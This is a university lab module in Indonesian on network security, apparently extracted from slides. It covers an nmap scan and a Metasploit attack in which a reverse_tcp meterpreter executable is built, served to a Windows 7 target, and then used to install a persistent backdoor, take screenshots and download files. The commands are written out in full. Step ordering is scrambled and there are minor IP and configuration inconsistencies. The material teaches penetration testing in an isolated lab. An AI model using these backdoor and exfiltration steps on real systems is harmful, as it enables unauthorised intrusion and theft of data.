Modul ini membahas praktikum keamanan jaringan yang meliputi persiapan komputer target dan penyerang, scanning jaringan menggunakan nmap, eksploitasi menggunakan metasploit untuk membuat backdoor, dan instalasi backdoor secara permanen pada komputer target.
1. Modul Praktek Network Security
Keamanan Jaringan Telkom University
2014-2015
JURNAL PRAKTIKUM
Skema Praktikum
Komputer Penyerang Komputer Target
Sistem Operasi
- Ubuntu 12.04
IP Address
- 192.168.1.2
Sistem Operasi
- Windows 7
IP Address
- 192.168.1.4
LANGKAH 1
Persiapkan komputer target
1. Ubah pengaturan jaringan Virtual box pada sistem operasi komputer target
Setting > jaringan > Adapter 1
Centang : Nyalakan Adapter Jaringan
Attached to : Jaringan Internal
1
2. Modul Praktek Network Security
Keamanan Jaringan Telkom University
2014-2015
Klik mulai untuk menghidupkan mesin virtual komputer target
2. Non aktifkan firewall pada komputer target
Start > Control Panel > System and Security > Windows Firewall > Costumize Setting >
3. Aktifkan remote Desktop pada komputer target
Start > Control Panel > System and Security > System > Remote settings
2
3. Modul Praktek Network Security
Keamanan Jaringan Telkom University
2014-2015
4. Setting IP address pada komputer target
Start > Control Panel > Network and Internet > Network and Sharing Center > Local Area
Connections > Properties >Internet Protocol Version 4 (TCP/IPv4)>Use the following IP address:
IP address : 192.168.1.4
Subnet mask : 255.255.255.0
Default gateway : 192.168.1.1
3
4. Modul Praktek Network Security
Keamanan Jaringan Telkom University
2014-2015
LANGKAH 2
Persiapkan komputer penyerang
1. Ubah pengaturan jaringan Virtual box pada sistem operasi komputer target
Setting > jaringan > Adapter 1
Centang : Nyalakan Adapter Jaringan
Attached to : Jaringan Internal
4
5. Modul Praktek Network Security
Keamanan Jaringan Telkom University
2014-2015
2. Klik mulai untuk menghidupkan mesin virtual komputer penyerang
5
6. Modul Praktek Network Security
Keamanan Jaringan Telkom University
2014-2015
3. Masuk sebagai root
4. Setting IP static pada komputer penyerang melalui
Ubah isi file menjadi berikut :
Tekan ctrl + x lalu ketik y untuk menyimpan dan keluar dari editor
5. Restart networking untuk mendapatkan IP address yang telah dikonfigurasi
LANGKAH 3
Melakukan scanning dengan nmap
1. Lakukan foot printing untuk mendapatkan informasi sistem target
Output dari perintah diatas :
6
praktikum@praktikum:~$ sudo su
root@praktikum:~# nano /etc/network/interfaces
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet loopback
address 192.168.1.3
netmask 255.255.255.0
network 192.168.1.0
gateway 192.168.1.1
broadcast 192.168.1.255
root@praktikum:~# /etc/init.d/networking restart
root@praktikum:~# nmap –sS –O 192.168.1.1/24 192.168.1.255/24
7. Modul Praktek Network Security
Keamanan Jaringan Telkom University
2014-2015
LANGKAH 4
Uji koneksi dari komputer penyerang ke komputer target :
Output dari perintah diatas :
7
root@praktikum:~$ ping 192.168.1.4
8. Modul Praktek Network Security
Keamanan Jaringan Telkom University
2014-2015
LANGKAH 5
Pastikan apache2 dalam keadaan aktif
LANGKAH 6
Melakukan exploitasi dan instalasi backdoor dari komputer penyerang ke komputer target dengan
metasploit
1. Membuat payload di komputer penyerang untuk komputer target
Output dari perintah diatas:
2. Ketik msfconsole untuk memulai metasploit
3. Pilih payload yang sesuai dengan tujuan komputer target
4. setting payload yang tepat dari sesuai dengan tujuan exploitasi
5. Masukan IP komputer penyerang kedalam konfigurasi
Masukan port sesuai yang direncanakan pada pembuatan backdoor
8
root@praktikum:~#/etc/init.d/apache2 restart
msroot@praktikum:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD
windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.2
msf exploit(handler) > set LPORT 666
root@praktikum:~#msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.1.2 LPORT=666 x > /var/www/praktikum.exe
msfconsole
9. Modul Praktek Network Security
Keamanan Jaringan Telkom University
2014-2015
6. Lakukan exploitasi
7. Menyimpan backdoor pada komputer target dengan membuka browser pada komputer target,
masukan URL: http://192.168.1.2/praktikum.exe
Klik run
Klik run
8. Sampai tahap ini, exploitasi sudah berhasil, kemudian kembali ke komputer penyerang untuk tahap
instalasi backdoor, baca informasi sistem komputer target
9
msf exploit(handler) > exploit
10. Modul Praktek Network Security
Keamanan Jaringan Telkom University
2014-2015
Output dari perintah diatas:
9. Periksa IP Address pada komputer target
Output dari perintah diatas:
10
meterpreter > sysinfo
meterpreter > ifconfig
11. Modul Praktek Network Security
Keamanan Jaringan Telkom University
2014-2015
10. Instalasi backdoor pada komputer penyerang terhadap komputer target
Catatan : 1037 adalah port yang terbuka tetapi belum digunakan
Output dari perintah diatas:
Baris terakhir menunjukan tempat penyimpanan backdoor dari komputer penyerang
11. Keluar dari aktifitas exploitasi
12. Lakukan eksploitasi kembali dengan menggunakan backdoor yang telah diinstal sebelumnya, dengan
mengganti port pada komputer penyerang sesuai port yang disetting sebelumnya yaitu port 1037.
13. Lakukan exploitasi
secara otomatis akan masuk ke payload meterpreter tanpa konfirmasi dari komputer target
14. Melihat perintah yang tersedia pada meterpreter
15. Lakukan screenshoot komputer target
buka hasil screenshoot diatas, berikut lokasi penyimpanan
16. Melihat posisi direktori saat ini
11
meterpreter >run persistence –U -i 5 –p 1037 –r 192.168.1.2
meterpreter > exit
msf exploit(handler) > set LPORT 1037
msf exploit(handler) > exploit
meterpreter > help
meterpreter > screenshot
meterpreter > pwd
12. Modul Praktek Network Security
Keamanan Jaringan Telkom University
2014-2015
Outputnya
Jika ingin pindah ke direktori yang lain, contoh :
17. Download file pada komputer target
contoh :
Maka file akan tersimpan pada direktori dimana msfconsole dimulai
18. Lakukan restart mesin target
12
meterpreter > cd D:/
meterpreter > download namafile
meterpreter > reboot